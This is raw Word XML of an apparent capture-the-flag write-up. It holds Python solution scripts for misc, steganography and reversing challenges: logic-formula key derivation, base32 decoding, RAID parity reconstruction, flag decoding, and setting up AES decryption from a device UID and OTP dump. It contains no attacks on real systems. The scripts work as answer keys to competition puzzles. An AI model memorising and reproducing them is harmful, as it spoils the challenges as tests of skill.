    <w:p w14:paraId="4BEC933E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"F_21"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4DD9A06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"F_22"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30EBFC1E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"F_23"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6833DD2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"F_24"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(A→D)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(B→C)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B8A56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"F_25"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¬C)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4EADE75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"F_26"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¬B)↔(C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008FB6D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"F_27"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¬C)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24651FB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"F_28"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¬C)→D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567F1E6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"F_29"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(A↔B)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(¬C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¬D)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BF2A9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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> 62.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"F_30"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IMP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(A→B)↔(C→¬D)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D246C9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"F_31"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(¬A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¬B)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∧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(C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⊕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2AF27BF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"F_32"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lambda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XNOR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))),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(A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C)↔(B</w:t>
      </w:r>
      <w:r w:rsidRPr="00215AD0">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:color w:val="880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>∨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D)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338B733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07CF40A6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EFE0F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Evaluate each page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71965A9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eval_page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01D49A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bits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6E9FC244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bits_tuple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itertools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product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repeat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1EC9DC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bits_tuple</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6D6E4E9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3BC9A22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15F15B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</w:p>
    <w:p w14:paraId="77D14CB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378377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76.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page_bits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eval_page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pages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25F55C67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0E6926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Folding to nibble</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388BD2C9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fold_bits_to_nibble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order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'n3n2n1n0'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67224089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n0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8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12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2812A79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n1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13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6EB4A4FF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n2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14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232AB39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n3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7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11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383953F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n0i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n0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n1i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n1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n2i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n2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n3i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n3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A56307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order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'n3n2n1n0'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78D74D6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n0i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n1i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n2i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n3i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8C7ED09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order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'n0n1n2n3'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8DD746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n3i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n2i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n1i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n0i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2C81A57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1A763E7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raise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660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ValueError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"Unknown nibble order"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DB08F2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</w:p>
    <w:p w14:paraId="296FA24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AB16E1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93.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hex_nibbles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43DA0CB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bits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page_bits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F270C4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fold_bits_to_nibble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bits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order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nibble_order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80E7E9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hex_nibbles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F1B6AA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9D775E9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98.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hex_key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join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"{:x}"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format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upper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hex_nibbles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9D36567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"Hex key (32 chars):"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hex_key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DE600B4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BB5BC87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Compute sha256(key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260E574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hashlib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sha256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hex_key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'ascii'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digest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0F37A05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"SHA256(key) hex:"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hashlib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sha256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hex_key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'ascii'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)).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hexdigest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</w:p>
    <w:p w14:paraId="640E865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C43961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215AD0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Base32 decoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E0A5F9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RFC_ALPHABET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"ABCDEFGHIJKLMNOPQRSTUVWXYZ234567"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304C2A3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CROCK_ALPHABET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"0123456789ABCDEFGHJKMNPQRSTVWXYZ"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FC0A8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2D67CB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try_rfc4648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5CF37C6F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s2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strip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upper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replace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 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replace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'-'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3F9962E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padding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(-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s2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6666"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19030CC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s2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'='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padding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250CD168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7CA4A56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base64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b32decode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s2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casefold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692B0FE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except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0066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exception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49CBB8A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</w:p>
    <w:p w14:paraId="6BD390F8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E6D7341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crockford_to_rfc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7EB5383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s2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strip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upper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replace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 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replace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'-'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9EFACB1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mapping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{}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC0F5EA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enumerate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CROCK_ALPHABET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7A6F643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mapping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</w:p>
    <w:p w14:paraId="1B424388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mapping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'O'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mapping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'I'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mapping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'L'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mapping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'U'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</w:p>
    <w:p w14:paraId="58256E0E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2EFBEB06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1741A27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mapping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E1BFCE5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</w:p>
    <w:p w14:paraId="02C1B5E9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v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mapping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5C6C6184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lastRenderedPageBreak/>
        <w:t xml:space="preserve">129.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RFC_ALPHABET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44E5F5CC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joined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''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join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51372B8" w14:textId="77777777" w:rsidR="00215AD0" w:rsidRPr="00D41AAF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padding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(-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joined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8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1624CDFE" w14:textId="77777777" w:rsid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joined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'='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</w:p>
    <w:p w14:paraId="1CFF584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joined</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE953F6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46CD8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try_crockford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1B4665C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mapped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crockford_to_rfc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6BAE7DE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mapped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B5E1D6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</w:p>
    <w:p w14:paraId="649B6FC1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A1B2FE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base64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b32decode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mapped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casefold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008B2B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except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0066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exception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8BDDAFF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</w:p>
    <w:p w14:paraId="1687366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C3F48D0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144.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ct_rfc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try_rfc4648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2D9384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145.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ct_crock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try_crockford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2506756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19937E5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candidates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2E021B04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148.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ct_rfc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is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1D34597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149.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candidates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"RFC4648"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ct_rfc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4121833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150.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ct_crock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is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DB42BF3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151.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candidates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"CROCKFORD-&gt;RFC"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ct_crock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4406E7F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152.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7FE9F2A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153.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candidates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E2CE85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154.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  No base32 decode succeeded."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BD9785D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155.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0EB7B2C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156.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candidates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4E13CB2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157.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  {name}: {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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ct</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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)} bytes"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FE26038" w14:textId="77777777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158.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pt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spellEnd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enumerate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ct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4D054326" w14:textId="180760AB" w:rsidR="00215AD0" w:rsidRPr="00215AD0" w:rsidRDefault="00215A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618676"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00215AD0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">159. 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15AD0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"    plaintext (utf-8):"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pt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15AD0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>decode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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15AD0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'utf-8'</w:t>
      </w:r>
      <w:r w:rsidRPr="00215AD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418676F7" w14:textId="2709F252" w:rsidR="00BB148F" w:rsidRPr="0013654D" w:rsidRDefault="00D41AAF" w:rsidP="00BB148F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc213279035"/>
      <w:r w:rsidRPr="00D41AAF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Misc 400 Digital Palimpsest</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="55EB3416" w14:textId="7E76D9E7" w:rsidR="00BB148F" w:rsidRDefault="00D41AAF" w:rsidP="00243F90">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D41AAF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30925D8B" wp14:editId="07BB9294">
            <wp:extent cx="3858163" cy="1219370"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="1644868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838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4C16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#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DAEAE4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os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="57721341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sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E598A11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C1285C4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CHUNK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64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1024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64 KiB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA29701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paths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"raid-d0.img"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"raid-d1.img"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"raid-d2.img"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7187E34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279D99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Open members</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD5B90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rb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paths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3128B942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sizes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path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getsize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paths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0257DFCA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030EE7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How many full stripes can we safely read from all three files?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70386FBE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Each stripe consumes 1 chunk from each member.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4023C52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14.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max_stripes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min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sz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CHUNK for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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sz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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in sizes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3750346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AF814B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read_chunk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member_idx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stripe_idx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A3F5F29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"""Read the 64 KiB chunk for a given member and stripe index."""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3287F4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off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stripe_idx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CHUNK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2996703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f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member_idx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seek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off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B5C8A69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member_idx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read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CHUNK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836A519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368B0CF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xor_bytes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253D170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XOR two equal-length byte strings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2496802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zip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3CBFBA3A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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> 25.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581D49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Output files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296847AC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27.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out_as_is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open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"logical-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as_is.bin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wb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0925645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out_fixD0  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open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"logical-fixD0.bin"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wb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904652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out_fixD1  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open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"logical-fixD1.bin"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wb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8A9DCC4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30.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out_smart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open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"logical-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smart.bin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wb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787233F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65FEBC6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ascii_score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bs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8E4D42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"""Very simple ASCII printability score for picking 'smart' bytes."""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAB07F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score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55CC8D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3910E70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0x0A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0x09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EE3929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score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3B7C6628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0x20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0x7E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E67CD32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score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</w:p>
    <w:p w14:paraId="5F37C7A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0x00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9F2953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score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-=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6A52AF5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11CEF4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score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-=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4E142E64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score</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774483A0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A7A7981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max_stripes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6793FE6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</w:p>
    <w:p w14:paraId="33930278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d0_idx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</w:p>
    <w:p w14:paraId="29D27BA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d1_idx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</w:p>
    <w:p w14:paraId="0ADE8924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63FEAE5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 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read_chunk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D230B3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D0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read_chunk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d0_idx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472F7E8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D1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read_chunk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d1_idx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99D437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132114F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Basic consistency check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CEDED0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mismatch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xor_bytes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xor_bytes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346A69C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consistent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all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mismatch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872685F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81AB2B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Write "as-is" logical (D0 then D1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3347FFA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out_as_is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C26D72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out_as_is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9198D5A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506B91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consistent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C3B8A85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All variants identical in a consistent stripe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033DD8E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out_fixD0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out_fixD0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6B7AFF2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out_fixD1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out_fixD1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FE5CB6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out_smart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out_smart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DBA16C0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</w:p>
    <w:p w14:paraId="57078AD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766DBDC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Reconstruct alternates for torn stripes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200D5AC5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If D0 was the one that changed (or parity is stale relative to D0),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5FF4DC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the "other" version of D0 is P ^ D1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4165B9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D0_alt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xor_bytes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6E86730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If D1 was the one that changed (or parity is stale relative to D1),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCB7560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the "other" version of D1 is P ^ D0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0462D505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D1_alt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xor_bytes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E92DEEE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7F408E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Whole-stripe variants:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DC573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out_fixD0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D0_alt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out_fixD0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70B75DC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out_fixD1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out_fixD1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D1_alt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DB5435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DE4AF2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Byte-wise "smart" </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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merge</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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: pick printable preference per byte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09204982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smart_D0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bytearray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CHUNK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6B0A7A4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smart_D1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bytearray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CHUNK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21C06E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840F0CD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CHUNK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6E62ED78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candidates_D0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D0_alt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]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643CFE51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880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Prefer printable; tie-break by keeping "as-is"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F54EA8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c0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candidates_D0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67D745B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32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c0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126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c0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)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489A70A5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c1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candidates_D0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67E04ABF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32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126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)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A0754E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c0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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C0E4BE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smart_D0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c0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0313F15E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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> 95.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F1F5A4C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candidates_D1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D1_alt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]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D7EEF5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c1b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candidates_D1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56F71A49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32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126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c1b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)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B84C9E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c1alt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candidates_D1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19602B08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32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c1alt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126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c1alt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)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195F9F63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c1b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c1alt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0472456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smart_D1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c1b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDD28E1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5761CDF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out_smart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smart_D0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F3E8EBF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out_smart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write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smart_D1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DF7196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B96E427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out_as_is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out_fixD0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out_fixD1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out_smart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66BB948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h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close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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453E7362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DD5D1B" w14:textId="77777777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>fh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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D41AA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2499ADE" w14:textId="77777777" w:rsid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CC70A1E" w14:textId="77777777" w:rsid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2E9F63" w14:textId="484F6239" w:rsidR="00D41AAF" w:rsidRPr="00D41AAF" w:rsidRDefault="00D41A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300003"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D41AAF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D41AAF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"Wrote: logical-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as_is.bin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, logical-fixD0.bin, logical-fixD1.bin, logical-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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smart.bin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D41AA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D41AA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4E4F00D" w14:textId="11CC0FA9" w:rsidR="00D41AAF" w:rsidRDefault="00D41AAF" w:rsidP="00D620EB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc213279036"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Misc (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D41AAF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Stego</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D41AAF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 200-3 Dead Letter Office</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="71EA669E" w14:textId="486F9D8E" w:rsidR="00D620EB" w:rsidRDefault="00D620EB" w:rsidP="00D620EB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D41AAF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CFC28A0" wp14:editId="7D5C9A45">
            <wp:extent cx="3286584" cy="4115374"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="9843916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91617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C971" w14:textId="77777777" w:rsidR="009617B5" w:rsidRDefault="009617B5" w:rsidP="00D620EB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="449EE8B9" w14:textId="77777777" w:rsidR="002460A7" w:rsidRDefault="002460A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc213279037"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="522AF489" w14:textId="7C28CF20" w:rsidR="00613932" w:rsidRDefault="00613932" w:rsidP="00613932">
      <w:pPr>
        <w:pStyle w:val="Heading2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lastRenderedPageBreak/>
        <w:t>Reversing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="54F3FDF7" w14:textId="77777777" w:rsidR="00613932" w:rsidRPr="00C3364E" w:rsidRDefault="00613932" w:rsidP="00613932"/>
    <w:p w14:paraId="5C13C85D" w14:textId="32457F03" w:rsidR="00613932" w:rsidRDefault="00C3364E" w:rsidP="00C3364E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc213279038"/>
      <w:r w:rsidRPr="00C3364E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Reverse 100-4 Gremlins in the Gears</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="6E67926E" w14:textId="05837C3A" w:rsidR="00C3364E" w:rsidRPr="00C3364E" w:rsidRDefault="00C3364E" w:rsidP="00C3364E">
      <w:r w:rsidRPr="00C3364E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="204160AA" wp14:editId="5B7195F9">
            <wp:extent cx="3324689" cy="1629002"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="19424780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7805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4188" w14:textId="09794BD8" w:rsidR="00C3364E" w:rsidRPr="00C3364E" w:rsidRDefault="00C3364E" w:rsidP="00C3364E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc213279039"/>
      <w:r w:rsidRPr="00C3364E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Reverse 300-1 Through a Glass Darkly</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="639953A4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data1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0x43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0x55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0x84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0x24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0xf7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0x5c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0x90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0xe9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0xa8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0xcd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0x26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0xbc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0x07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0x4a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0x0e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0xa8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0xe5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0x5a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0x48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0xe2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0xba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0x77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0x7d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0x6e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0x11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0x86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0xbe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0C2A9C37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data2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ord</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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C3364E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>through_a_glass_darkly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C3364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59B79118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461883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flag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06274EC8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27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2D06056E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22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B0B1E55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j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</w:p>
    <w:p w14:paraId="549786C2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4199F2F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j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22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FCBEB0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3364E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># For j &gt;= 21, we assume the value is 0 because it's out of data2 bounds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2C665C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data2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4E5FE483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byte2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data2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4FCE50A1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8F7FE90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byte2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CEDBE7E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67B1BBFE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byte1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data1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2885DF68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32D87458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73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19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0xFF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F42C76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^=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byte2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165A7234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26DBE55F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7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5CFB34FE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rotated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((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val</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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8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)))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0xFF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2CD90E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4F8FAD53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part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byte1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(-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17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123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6666"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0xFF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F92EAE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part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rotated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5380A7C5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flag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9B11340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93C3A31" w14:textId="77777777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  <w:lang w:val="en-US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 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8800"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>''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join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chr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flag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FA8A78F" w14:textId="778C294B" w:rsidR="00C3364E" w:rsidRPr="00C3364E" w:rsidRDefault="00C336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0206314"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C3364E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C3364E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3364E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C3364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D5F8960" w14:textId="5D7F65AC" w:rsidR="00C3364E" w:rsidRDefault="007E514C" w:rsidP="00C3364E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc213279040"/>
      <w:r w:rsidRPr="007E514C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Reverse 300-2 Make the Pieces Sing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="4CE7E270" w14:textId="6F8F5E5C" w:rsidR="007E514C" w:rsidRPr="007E514C" w:rsidRDefault="007E514C" w:rsidP="007E514C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E514C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A23F458" wp14:editId="3FAEA05A">
            <wp:extent cx="4163006" cy="1333686"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="128548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89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FD2" w14:textId="26B865B2" w:rsidR="003A6BE3" w:rsidRPr="003A6BE3" w:rsidRDefault="003A6BE3" w:rsidP="003A6BE3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc213279041"/>
      <w:r w:rsidRPr="003A6BE3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Reverse 400 Saint's Rowboat</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="05667A31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hashlib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="476A678B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A6BE3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Crypto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660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cipher</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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AES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58130CBF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DDCDFA3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# Step 1: Gather all the necessary data from the files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7C71C4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# UID from stm32_uid.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A25484A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 8.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uid_hex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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"5a928ebd3f5729b548b77e73"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435321CA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 9.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uid_bytes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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bytes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fromhex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uid_hex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744133A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9A297E6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Obfuscated keying material from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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otp_dump.bin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2DAA27C0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12.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otp_hex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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"5f08228c29eba8c448c2869bce79f60fccce3d88b0357af697b2cf43f5823228"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C3B861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13.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otp_bytes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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bytes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fromhex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otp_hex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68553F4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3F29514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Raw ciphertext from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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secret.enc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7C4DE725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16.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secret_enc_hex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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"395fdae58a60af5a9ab6ed5325238531e6544eec404c70e39db60299b7109608"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A97033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ciphertext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bytes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fromhex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secret_enc_</w:t>
      </w:r>
      <w:proofErr w:type="gram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hex</w:t>
      </w:r>
